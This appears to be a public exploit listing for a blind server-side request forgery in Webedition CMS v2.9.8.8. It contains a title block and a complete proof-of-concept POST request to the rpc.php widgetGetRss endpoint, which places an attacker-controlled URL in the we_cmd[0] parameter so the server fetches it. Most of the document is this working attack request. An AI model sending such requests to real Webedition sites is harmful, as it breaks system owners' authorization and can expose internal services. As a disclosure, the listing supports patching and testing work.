Share
## https://sploitus.com/exploit?id=PACKETSTORM:175021
Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF  
Application: Webedition CMS  
Version: v2.9.8.8   
Bugs: Blind SSRF  
Technology: PHP  
Vendor URL: https://www.webedition.org/  
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1  
Date of found: 07.09.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
  
  
2. Technical Details & POC  
========================================  
write https://youserver/test.xml to we_cmd[0] parameter  
  
poc request  
  
POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1  
Host: localhost  
Content-Length: 141  
sec-ch-ua:   
Accept: application/json, text/javascript, */*; q=0.01  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36  
sec-ch-ua-platform: ""  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300  
Connection: close  
  
we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3